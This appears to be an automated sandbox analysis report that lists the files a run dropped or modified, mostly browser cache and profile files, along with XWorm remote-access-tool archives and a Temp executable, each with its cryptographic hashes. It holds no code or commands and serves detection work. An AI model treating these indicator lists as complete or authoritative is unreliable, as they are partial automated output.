SHA512 c94367f7f01ce2c173b7b9db7b555c4ce5f31d974c37f5ea2d7fd73a17dd9f4c8752ef12cb990366b59951b23880d8d096d9c60478a5e2a21aaed891dd13fcc5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003c

MD5 fdedc7356552ef0724257c2b397673ba
SHA1 dccb7b96ab20b5fe855872378328214c9a957f33
SHA256 561ba8130265f08767b506be6006d451507a6ede0b1e99ca5c0c3314a2b6afb7
SHA512 754d542ebfb2e035c3a0fc01a0f6bccec74ceb9574b376d433e487728f7bfaf03980cea1b3ae8ce4103e6d27909a7781c7f937be6482d105a919d49e7a021568

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a5e5929ae65652a3_0

MD5 cb453b47656efb0ef96bcc81f023bbb9
SHA1 786cb9cb2c0166286e42686d5ac454327a7ab4f1
SHA256 23fa9877169b8d9fb1f594417609500ec705a0c57d22d75212f1a72c7dc33f45
SHA512 d5cb4e3aefeed3b79c8c270472754050b08c4b911e93a25b9ff74c2473b989a475bcaebe1294adeeba601dda592a85122b07aae27bc1528f73949a9a2d756f07

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a8377101ac0f3165_0

MD5 55e506bce266263873186b2089be4b87
SHA1 a6ab1cd12c9c6ef157818eaf6e0f0fc3d72076f6
SHA256 bb0dc16c3246cda97a31bf5f629ccffe6c6bc7c2d062f70d8e1a73c5361c3a52
SHA512 032d14aed9a29b796e7c3a8ae78d0b818510ac8c42c004b0f1152e9183661d4e3e91974f3b359cddcb160df294764e5b729fab2631fdce96abfd6c9f7404973b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003f

MD5 c09e0625df7a8f20db9b66acb754d42d
SHA1 60559158068f238553120a055f463199c7fed51e
SHA256 a069a0771667fcae932dafdaa94d953223e4090536256db245285676c832617e
SHA512 63fc342d52ee2110dd7b0db731d1fd26306857ada46fa1d5d25ac0758a1899705c9ce9ca93d53f6eaecca08180df1b8cb2c731504fe88eb55c434b8198a3909f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003e

MD5 eb0a159bc4f711f383bf205a7e8abcf4
SHA1 744323ba7d3220fdfe5e7251fdee5f9071ad121e
SHA256 e2a7516b0352d91c76b7e6eedd418dbf01b8ee1f0a3ef93fc88fde0d3e3d68b0
SHA512 082ba40e7fc08499954581d4a3c507dfd0b94d519e2ffff5f7d2a6e7f100ce7e24ab87c7c3d49f64132585cd6db07c00cd1ef8527126d8764ec8493b7a92c954

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003d

MD5 aa8ada05dfb233695d4eb83b761fa2b0
SHA1 73ebf0b671fdfcd3defd6144d162203fd2f1d664
SHA256 d07cb56a265fcdc56c6ce7c282efd2df88bfe22ffa04ed9d667fcca83c32960d
SHA512 133429f4dca97fb2a0754c63f2ad0036e4f5316e6507e1ceed7ef110feb8cec86945bc9786615e8558a67020632259e8ac96c8a941374a5108f03694ada122c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\57c06d65b9fec69c_0

MD5 4808309415a4fd19e2555063e51bfb95
SHA1 a1120d5dbe149fde74bb54e21cb874e69b9ca2da
SHA256 ffbd005a15ab44b1d625e86a70b8d422362230ff2aec74aaad3260ae2f1787f7
SHA512 9f27706ff474cacbfbba4e2f70583d29c00d532d236a5574be91c121022f757886a8b33079e2a80b09ff29d28c2f15d53c8f08fd92de306532ac93ec52228737

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip

MD5 f0448a71fa9118b4ce51cd853bea934f
SHA1 798873f6194aed7c897364e8b0a370273c6c1ca9
SHA256 72229a3bddc7cc093532a254293acf2b8e8891f749a62093d300d9667d90eef0
SHA512 fad4f7c8cb8a813e5f783a22d3cadeacb5e2a0239e02b35498c52c56d715af5fe276a1fa99902cc67e9974b76e0285785bc12a5e3845186953b33f898fcfb39a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b689c97c7b7b90d633443af653e06102
SHA1 1a2f1d38ab2d1dd8e1f4efb5b55fae3cc01fe3c9
SHA256 6e074a5a8bea4fcd46c891e8cad3f1cbcae1b1d5cadcf473ab9d064298d1441e
SHA512 54c99677f500359e5847db0c47405f91c42d896d03cb7f2b20507a169e045111bbfef66964cd481558fc2acfdb7073f66b68d7f4491518802fc0af2021ae6428

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 55db3c778f26ec1c5e2cc429c9bf20f4
SHA1 287aaa85a880a40b2753bd687ccc93829f42dc25
SHA256 29d2922c96361187a40629789991ab2588610c73f61867e69d06e7f67be9dc82
SHA512 7221cbb3a3b0300874614cf481aa98af830a845d3f4e67771531580a0b1378dcfbe7b011f3c238dd38ffaf8fd690e6a5444566b25d310b83fd365fca81773e3d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a08e168e2eb4037c3714c590414178c1
SHA1 19bd7d1eb5cdb523cef14fb690aad0271a09e103
SHA256 e956c9be5560c77c8066c3f69f4221389494cf92f226b68ade8707a7b1911ef9
SHA512 7f9f09caada7c26b423ad7c5b4155e7064031f57a467059d968fe832afd8fe47ddd8b5e4fcce15be931b78793fb60382bff3f1e93c1a0b21d3221e667aacf9f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 831fd0e64363779a49b0dafaa21324ab
SHA1 d85b173758d793a4c75c827d0bd62696109de061
SHA256 362fc2e008a19a8d3323d42a99396ac3b40c650152a060b710bfa4b88df8fb2d
SHA512 90ae3d4fd37a9ec96de0ce8db654ad0786ff45ef5e4445aecacd523215c77a1f48788023151ad2cfeb17e0bf81664e8d8a6d405e48128e8c1f9b2a912d4871a3

memory/3540-2958-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 198977649b29fcf4594b5292db74ffd9
SHA1 d8bd052444a229b57c445a3a4070cea794e4b5e6
SHA256 0c7098deb1f2529a4b7c6a595d8dba1210e8277458004b1bfd811ec835718a38
SHA512 0612251c47d8fb974fb0b8bc87bd42a3a9e590d75d7f6828935c601bc5d45ce3fb5242f0b60a89a833c3bbc20cd51f6c554d5ca7cf44eb92c220dd14ec329de7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f8046ef38e5d82e5e0770110c0942227
SHA1 6787b69b7e4d176795a5cbc10a7cf611767814cd
SHA256 3e063e3989f0432081b1a56b35d3293cdb92e6c69a5626490b53290427f31b96
SHA512 d684ddc0ac922d76c33b571957813a08cff0e92fcd23bc4283f3c4244d38a7c15eeec087eef6dc37a888bf075eae88eead2c1b9025fcd9960bfd43cc6d1b59f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\267dd3ccbd579b0f_0

MD5 dbf7a1434893c75ed8b8ece11cd95df8
SHA1 4a2927a28c3c3cc79979d9d1778a4a5c675d4597
SHA256 4c787015e8a8d8f4a1dbebc6c0fbf01f850135ebc58966fcc07f569e1e3769c5
SHA512 59526562a2c05052560b1b9b5758adac9e5e782434676b9c5acd63762f342ee6e7abb7be641eb48ed840fa3ae753851ea0ae35867733f8a74478a13cf23166e7

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip

MD5 b20f9c99f1fae6d41db4da27d78fe1e7
SHA1 857e93b9dbc5c9a117d101340838d34a7410faf7
SHA256 3da76a39a77eba8f12645578c25f58ee61a084cb546a3707cfc1edd5623589f4
SHA512 ff9bd000a1340f7e84611db451f7cb7befb53f9544fe09072107fb1eec16e2770fbc901c4a2ca29305be8ca801357b76193fe099e581a3ef79ad123c8da03d36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 78ebab7704956280e8583fee880e5620
SHA1 a7a60b6d4b2a1322621d0cd5fedd034da9ffdc4a
SHA256 3f7ab7f5fe153234ba670631518937795bc888fe1a646d3b7b7c773a3d0fafc5
SHA512 cd5a90127a02de5b93929961a94066dbd0b4c84d5f9bb0d3e3ec8095e8251fc4202f603a2c3601f210f1f37123a5f9e3ba5ca9df8824068861a7549151af0c9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2bf5c10182424c3550942c0ba3d65b1f
SHA1 253cfa967e36b80e7ce334d04ed2543a410f2e78
SHA256 fd4e2c1ec5b90d24673a3ea8bc8052edc1c54f76f3fcd74527dd8188580896d0
SHA512 ba690a8625fcacfaaf62481ef18749fa43ba5efcb444fb2b08166634faf02b43a9b7643c6acfa8b5f1e14b5669d2d199230533b0d4661b21f1656cdcba66c073

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 dddb4b7ff30e4a4f55bf0b8f0a1f5d36
SHA1 d63589fd4351cc3a34de58ce2b1c21bf71539268
SHA256 d7b5dcace8cc5d880c18295558f1c2844de48ed6865011b8014d2cca3074648d
SHA512 3af3afa01444adfcede7482fa83be7432321062d1b07c809c8346f7a5bdd1efae86a0e175f45889e33118906552feb003cce48cacc177d9fac2e60d69d0ac20f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7e82462cc15b39411877813781007caf
SHA1 91f920f966bae0cd89260f5f3210212ac2fbde8f
SHA256 bf595f8dc2e9b1829ec4ce44fb9dac96d388d738c5aa8d9719b2c6ea81e86e49
SHA512 ffa8ce87705ead2e264888d8c8d912e81207083e62ededa7c99422b1fa6aa3de65a3d15e153a855b639e59d4ead03a70b259397d2d9946a4e77bbc48a429ddad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a87633d13dee90f6e990ebb475ad4dae
SHA1 dc85c06c2d856a528b14e47d4672dac23195880a
SHA256 d2014d7313e5c9260276e2732e3c9db71e3b8b24fe91895817250072afcfa644
SHA512 511a4ddef7b0aa804ea01ce75d6f1339ac885b92a51ba8d4d61f2a3807c21a8d7b226e3e0e69e5cb86e59e1beb985af027503bdeb52af0e1f9f4e9d1a181598a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 876e72f2c5287206458257e41cf3d680
SHA1 838e370fba7162b2f12128fe44a0d48eca7f75c4
SHA256 8469de5640cc91b3c9bec92a3601f01c9025e5c20b45b2b05eb9ebdd598a9b63
SHA512 7161fae31057b47ec5b07f49cd556b2cb828a1b43cca80f9cfee0a7cb74dfcf1baa7da4e863d05824a9403e6c7b49db168e7c08ab6df830533972b349a316e54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cb95b243cf38d196f17a446c02d2ee40
SHA1 cb79c0531653293b5a4728219b3d6987a7257ce0
SHA256 a9885435c60a502c950cd64539ad99b2b5daacbc3bff2377b96ad6821569ced1
SHA512 5ed1c9c67566544dadf8c942b8fb125aa68c97da782848f00f6dc8498d0250490b9f7df815be9455d21a12e2377d7fb7f9fe98d24175205b756b74da7ff53a35

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 1eab418b098392c6cc39cab58087a70f
SHA1 dd79cf327885cd102c6357aef8ee5e166ff33500
SHA256 9c6d80c0a8fadc690368fd22af404f9bbd8336f2ca85b8b8fa2ab5c8b8506e75
SHA512 66c015f011289e9fac7915ea6ac0522c425703375e88bd80cc590e24be7cedd1afcedbb1265d56b9e4c391814e6e1822a634b01f861c9f528f3f00a780d36dc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9584a3d5a6d10ff5e0231bff492e26f7
SHA1 89a20b2197cb68ff6c413c2c022731435379b214
SHA256 ff6dd5503ab5aa5577a20e2c9044f8f0f9a9ab355c0fe96e62e09eb745c6ef7d
SHA512 1b6f3f4058ba00d46394d6e7b3e893652e05273ce149be1a0e937b39dfd4dca8f0423e9a1ca4e3348bc9a8a8675e94902274a29213348b2562dd1720e4859247

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 368906c93a73e332eafb1bc63dac7e31
SHA1 12f5b431bf56d6595d94fe94a1cff9f727fc0a8c
SHA256 4e501ff04f2febf4a8794f695039b34352e8b2e0a1001357106aca822caa92ad
SHA512 95255d6691aa21da1d285bd237fdc29f9e1ede178f454549e8401037d01517a49e72814bcff8e15352476b39933a66f1e636157564bac4150748fee9024ace7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 887840705d42fff1b0ad16572f5002ea
SHA1 65d10dffcad78521b140b1059c11144c40b1b5f3
SHA256 8098119ef4404a59e6c3bf18ec8eb52ad261dc188f6132e093e6e5cb36921535
SHA512 a91710acc11501124e8454e0eaa4512d16e7ac03e28f66490cb90e2467dc5b12c3f0fda0f17347f7fe033e5f76645a125b587ed544fe5de0218ddfe5450fb928

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d86edacb16a7bc3a8e0b699b6ab97ff
SHA1 dc8e3d632468b43ee7b3acd14128e78d369f3db3
SHA256 1eb64809f6bf39ccc175ed08fb7cc7ba17478f53fc8750fdc79b10f0df9ff197
SHA512 e4fa551099d2e69a80f2091f0aac8580701c06f7927d7703faee1413131f750d6c6a48e51d7ba0c1531c31a5c3920d95e1ab3bd581e49ac7a5fafd0972a1a15b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 6dfbaff50281ba29e2082808e6b9ffa8
SHA1 9e91faeb99e8a587c27f2e0c91d311432a766a9e
SHA256 6b08989c811fc321ff68ca9a9829339fa36eb60bc2c197a803be2533f0daeaa5
SHA512 a6f34e6cc4a407c62864871d72ef1ca759fa030904ae7e83714da063a9cfc3c305e87efa12a8261c70855677a016e08616b05176d17f185864e29b52f680785e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe654571.TMP

MD5 e8b04d6e4fa3a0449c4427b198c3290f
SHA1 39f6c8af3c80145dcbf73e813190b6fa74aba018
SHA256 0e7797d3b24dc8c19f88bdb02dc9fc260527de2639dfa0c8f05db29fc77f4cb5
SHA512 94f6cedede30170d70cbd080b6a33c3540cfd9da778981c59e4f8039ace2e5fdf0d44cdcd50350bfc1fb0186f4e9f178811953c85a38b492d0bb4970c5b0608d

C:\Users\Admin\Downloads\xworm5.5-main.zip

MD5 f520ec1d6a4e7343d8c5f4307aa5c5bf
SHA1 f87d5074377e21123414877ff3e9971ed70fbf2d
SHA256 5ca8e263e0cad78cba56e2a15fb096985eacc5171b273ecf5c2954477eb33411
SHA512 e6f3f390f0a490c125e1282a706655d52cad001327aad067dfe22b53c41dafe0b53e2a6755e2e1c9d94a60ba52f60563faa60bad5548d888d162b804e934d5dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ab08be58b8d3ac70583cbab5844b7f42
SHA1 da66cd59b19c52145453450e9fd376032aa7e275
SHA256 ba99eb03d16843546af17a0c3b2dcf1228d29dd15f15f1fddd76e04a870e9165
SHA512 b4a87b51b2c0cee857c2b6595dafc4fb0edba9df9842c72129d163f93954cb6aa77d249af19d27c67b79c0a8add2b5ea2d3dd33dcb954047cdcb9b992e7370e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ced7482e3648d222ded715ab81e0c5cb
SHA1 ffff579dfd79f08056fef2c5477e7745a5f42e95
SHA256 e0cb451c6e901532e5c00e9a6e6c15f8e9512e2863c992bf6ff99846d91e7c7a
SHA512 84bb87464fa91a64310a98fa4d20d8662c71ae15070d7594283acb0c66a51341698f975a1ec6f6dec4f16ed602fd345cfd4cd61e53d2ecf30d7dd2f4599ff5e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e0eca013ed8bbe61de47e6eaa4301d47
SHA1 c579dca150561ed342a95da4cf05d5fac755eda5
SHA256 3b41abfee927f25b86045dcce01a50799bd410ff5f56df5696c617a6f8183ae4
SHA512 b1fb1700b33992dba9a8920de7d3e6b2c337353dcd58cf49552918e7ca1584405cdd6ab5d6a9f9be3f9ed4b711e7efa74ea12384801b56c91bf5a86551791585

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1b74057d3f4581490a94837f963d8084
SHA1 ee89a9fc1c5160fb2bf8d25c018aebf963c146e5
SHA256 9eddee721550f1634856bc825a0d3e4358175af01b7c614b8b6c1e09de480657
SHA512 61d3a96e8dcfd034da0da4c31ea27f7bebaca1d446e48b80760d44b7a1ea191793b339bd80f3a5cbb902247ef39210f6eaf3ce30ee7ffa4ca5d6852eeb5cf229

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b4bb322572bad55df022c1e2f43fbc2c
SHA1 6aebe2ffb8d43640960219da5cb0624918a3fe48
SHA256 36165988423768c64aea9f9e1349cc3de6e6f51f1cf67b954ec10e9b4bfaa511
SHA512 d7d72c2b0c4e29c15a546a4e261ad479f3c04fd765689777571a82d6185c215cdffff21193e369fef0f05c8e07df228d180fc23f1332d757ee6551c926396080

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9e4f6e3126ca6360c22f2162fbf5c2fe
SHA1 372747479baf8e3b928d433d087d0133d0e76f07
SHA256 7d6e7b629f95d32adbeead19cbd6c6cfcc4fb4b7ccedf4b612af658d50ec99df
SHA512 7f3b71ca42161c7b671b62c97bea6fec65054a592ae4c4fe4be26019564389039f11debda572439ae41e23a394ebc8ffd74d794bab313fff204a32ac672b73e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a6826c5ae50bfde5f96960cb6761b3cc
SHA1 ced6bc5f2a85ec9b78c13dfc53c9abb2dac0bd9d
SHA256 6614dc09edd06a3073204261d90e61305a7cedbb7bd4bedcd3173ac1fc47be58
SHA512 cb27dfcd9316c92eddd54e40ff145e9b100301578651d48751f7f911bd3208270c4c448a32c3e6f1c4493acfbc32a99a8a6ac1149baa3f49de1339627594c1e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2f31dc8ada47bd6281b83faf4c01da27
SHA1 bc964d627073036d34eb2a836031bda8febea5ba
SHA256 855fc8d5fb2a2eeb5541a6a8811c976d3124c9b86b104562058e5858af88c713
SHA512 f818658517c50d4a6029e95212a2203e5a6ebd6ccbc78f73abea8d4a44498477756ddb0bd9c92b99eac450070807ea6b42eb2cbb74bb300aa03eab53a4ea1631

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 423e784afb42783c2c5b632c7061ce0b
SHA1 6fe8c34db064c36b87640de7e3419144e24bc880
SHA256 b2329d36101f25c8b66e727f673fea525353403ba501f5c8e4e6df757ba44354
SHA512 156608f3276433954b6243a769fa6b1869374b7bf504257c3bd6b397c9cd1d0b9be6cd1b3efd525e1aef65e0de8e97f9a79b4ee30c0bf0e5053a17260f014fb6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 29565cce88df39d50cb7373a98ea2d91
SHA1 a1da3919f829017768e76341d73a6015c1407c13
SHA256 126719c5acdb5bbc2fd93e0ed9f6edc4bb94feba2f846d4341bf32662597ad40
SHA512 68cc44e05acd92b6933685cd66f3e08aeb4736234bd79064dc913e53f417ff112bb44ca76d2eb091771ddb91767e6880f63a3d61047097f1f69bf25be313db27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a79681bb4043ef80d7661b7dea0dfc5e
SHA1 9500057d0e07dd051f976092b7c336e07e08088a
SHA256 830cced13e3a2630cb2ae1a74fddfb8d7913950285d7e3d14cc46f658ce9de96
SHA512 2670b1bf91e8d3f7549372d9f9dec82dadc166f14909f3751b548f606894adc500f944853411aa49ca973c68c777ecc384b34595b34e39aaea791b59241c4770

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1110c57d5a23ecdca1e65f2e42d871a4
SHA1 6335bdfaaab8b42673ddd53c961f1ec495956a13
SHA256 e75cecc3f3363549011eb99f846b80ef2a3b7955e5f9825f8b06d76e84ba3e85
SHA512 d8228b3c87bf66e28771907538165de2a6afdc024fc10fd731a4da19daa372a7d73b50b0a77555a1d6f4ae08f1c8fcadb5049438d84533618ce32ed0175a7429

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity

MD5 a4bcbf37dd6d06005d598d038a7f689d
SHA1 5452edb46ebe978a90abd481ff8e45d6651ff37d
SHA256 4fffb084fc483dfce60e56fb2cc19ea4d3461386f46143eb30483d668f76b991
SHA512 3226a8cb01e49315fa1c1e801196200a40cc027a2298d4da09e13d78e1af61e6a6d910f3b23a0f6b42890988d61246daac95ac213b7a6d625b484688cd7be00d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c14c5db246c0fa044f36652884678581
SHA1 919043a0bda498a8997927b9622d5a4a5f5ad204
SHA256 edc0f18a1a811591b783481420caf63083207efac1d55b796e8558d4e3b31fb5
SHA512 b71cee5972dcd6bb7127c02d39833d6d68b5a1ba2915c46693ec195166371fec2b631d6e45482689e2f746b1982a90df6ba353d0bd29e74bc7e4f2d9d1c14538

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a464f875b4812fd6981192ef90afc706
SHA1 d179aa5e0f98cba4e8eab258418d0f5fc5a42fb8
SHA256 f4bc877583c1f5b63983ae5626ec6f045c704404740510558e45c1ad6ab51c3c
SHA512 9079063c32eba7795a98e461524073aa091fa64c3c4d371affca549156cc1264dc5fe27a962ecc6be6f3ee5b706c8b78de46e696f92fad36a88e0aadee312b57

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6ae641daccd8ea07c3fcd1d477faf42a
SHA1 cbec4a40558ce10684967028282567bc142fb6da
SHA256 08473aa27850cdd57ff76429444c5815b80726aa82a3685aee93172e39d6b757
SHA512 00a9dc96ce45b3cdbb8f8e98fb62cb2ad8b36a02f9d758ebce3ee36e148b0a093d0a13b005fcbf78bcc925c9a288c17741262781d27135c2af9c1aeb9623cfed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 75f036782643e673295dce1db04ac007
SHA1 c01ecc8849aad45e7d4d6911fbce4ce612ea7988
SHA256 b76eae59e50178259de0eed1a2e1c1f7e1378c3b8e5f2ef6c714b28cd6f66140
SHA512 f1ca7ee3fe9bbefd0a1bdb4b5e18895b91257dcd633ce788fbca2377227b9056738140ddcd1507a5baf5d024c0efeceb9005ad72b312b5995a8994f85e4ee449

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 dd96b1a2473560d9bb306c5d068a32c3
SHA1 34ff9ca51fb792e6604114ee640a4c1c2307f767
SHA256 ddfd7c5f9893615724ec6906d4359f35f2e7520e7fa565825919f36901e99a39
SHA512 6897f81698ec5cea8ce45433e569a7ec6bb8f7d36f3c1eaec9a1a2c304d3006ecbdd9f4226450b152fbfe0ab213a4618c5868a9d1fb92ba3221e322550aa5970

memory/6708-3907-0x0000000072DA0000-0x0000000072E2A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 2a78878cf5a74ccdaafb144d9bad4681
SHA1 7812a06a52b6b62f2576191a72eb44477e3f8103
SHA256 6763acf2b1046abc43e53fa3aa136e80825298a95c0be92651d7bd2fdd31204e
SHA512 b9cf9cfe95183214dc78b765a3a12b24723570e22c34c96bbdc4652278833918651e2dc6b6e2621add74c162e2deb06220b8ce76f0512fcd1f20e6a31e1b6c43

C:\Users\Admin\AppData\Local\Temp\RMA95.exe

MD5 1d1fb7b7379b8a94ea375ccf0e1c66fb
SHA1 ba38186e21250aba3a2d227ad72cacfe7a17fefd
SHA256 a79344788106e8a3e997e1d944bc09c51976ce011914ed783476f25aa90b0bb4
SHA512 9115bc3352bcec53ff54dd990516b03746c67480c4f96277fb8c0b099388fc3220492fde61a61f9c341c1a44aeca6a2fe355569169a698cd0b8878caa517d8ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cef9526e143b4511fb6e3deacb33d876
SHA1 335d41d5ee6b6f14fcc446289dc9ac15b24ecb92
SHA256 a8064674512397d2e7fe2a21f9472c8699efacf3b64cd762fd6f292a41f37880
SHA512 a3c5f12de72d1f13b5fb8f5d59a82dbf0447258e3d68712d1b6c35067958e5031432fa474a58dddb0d333b542a334a761275c36e8209366eb4f9beff08942413

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ac9251ffbc6e88ba7eb9107b1309d6e6
SHA1 237be8bc6ca4c908e2307d2f105bee90ebb3df6d
SHA256 304a0c64a274cead8e059e30a6036d279b3fdab9ccc1cf506d6e057ee1361e1c
SHA512 4292bafd76be39e64351b259616c270f7a34bbaea2104ffcaeb5e02cb4e6e2af035e7f9f60f3e1cad0ef7c4e7a240c9d8c7ab99e34401239630aa008e3ce548f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 acdde94e6e38ac4f2228cd2bdf0a6c39
SHA1 1313b6e4a6c6c5a04c451d3d30e77244de46bdb7
SHA256 d72debe63e812b7feabdd5a3ad86fe036a97fc4152ca63ed3906df2bb9c33fb1
SHA512 795bc8d5e80ad45424307bc4aebc86a50c1071d72a612904daa589a644206d51e28679452ee378e114fc4fb6c49ef89268b42e8456e7d36863ce7334b3fc3783

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d3f54b9a88a0fa2c553114040f98579d
SHA1 5e3dc47ce70abbb8c536763a4f6264ca371bba5f
SHA256 8091ff119458a4abfcc48ecba2689aba8b9581d6797184758d6b8dd9ff56d5ad
SHA512 82edd9ca93b4b5b0006c10848320a3ae6f2436d4dc4f9f2ff6c22d161b37688e7c56a55809dfb082e3280fa48ed985e853da398d33dce4fa7ea69227f4feb6dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007e

MD5 1e6127fd21364fd3cdcc954a92129cf5
SHA1 218ed567efd5938aa1c7cc1ed145ec31f8d45950
SHA256 5cfd2ec978b66b9d5a4e6e1e43578ee27f16e236f47dba30236ca5ebc929a0dc
SHA512 68f68a1c1ebb5c4376c9fb4288e923f6ca2500ee1c422c31fb3dfe122b1d690828794bef2e44edfb525a7140374c6e42e7d9f40084f7015a05fb24d994925ea8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1f9fd94dc73a18776092b825b2777a6c
SHA1 662f048cb3f8d19d3457814a8acd799dde6ccf71
SHA256 0e177edf08c626bb34cde8ae85bc8bfbb4f76bb20e9280ca3cd92920f13bd47d
SHA512 9c93a2aaf5cd0d16e75c4be2b249c2c5e8cd18cb046f8b62b9aac5ab65531d9e8b63cf63a8e5dcca117d1bab3d65d084f26fc7b102512e5d99d460b89b293471

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6c557314ce746526b20235481e16ec7a
SHA1 7f6305e4191172f98d9263cf67a18c6429af9229
SHA256 653217024bfc2c4beabf0a7a9a95a74a5b8a3c11a3cf4a0eb24a97e3b45f0ded
SHA512 03a8a808578119d31fc72b77be2bd43ebdcd64479ac602f8028dcf929484c5a60eb86b226afb73348cfbc0eed1ef1d49e810b990d2783e56e87a76ce0e06d2bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 acdb3df1b9cae51bf27c636c89553d0e
SHA1 3f917aac6107be6a5c1050a0e67dc1c5b9006b92
SHA256 6989e0920085610c3de9a9f0008d041f8c11a344c858e24e9c99686a330aa18c
SHA512 c05cb7aa5c6716227958f4ead7089c8b706159351ecb4f417195fc0c651f5813eeb26ae443c195ddfbd26b20ce92a8452100082d9eeb5f8cad91c2e201c7f599

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity

MD5 152dd42711cbe7a9ac01aba5605f16d0
SHA1 6682222506d58ba0d22d728534630a621a58c8fd
SHA256 4ee97e528c2b038b83a00d1be3767942257ad470285fae2784c85159b082acf8
SHA512 489cb5a5012e9f8e2b8c0dd1b1495b159cf49108c36384dcbb117f103b304acaa6e754c9151275ef5fd6f9436b0af383749f202320eeaef27d82c2a1b0211efa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 40e51521a6fde954ec31cc366830299c
SHA1 9f21748ed11fb600e4467d64fffb4b8997a3b954
SHA256 b6c62ec611c0f5402a254a6fb957082ffc38fd3a45aad2a7425e4cdf84fc4078
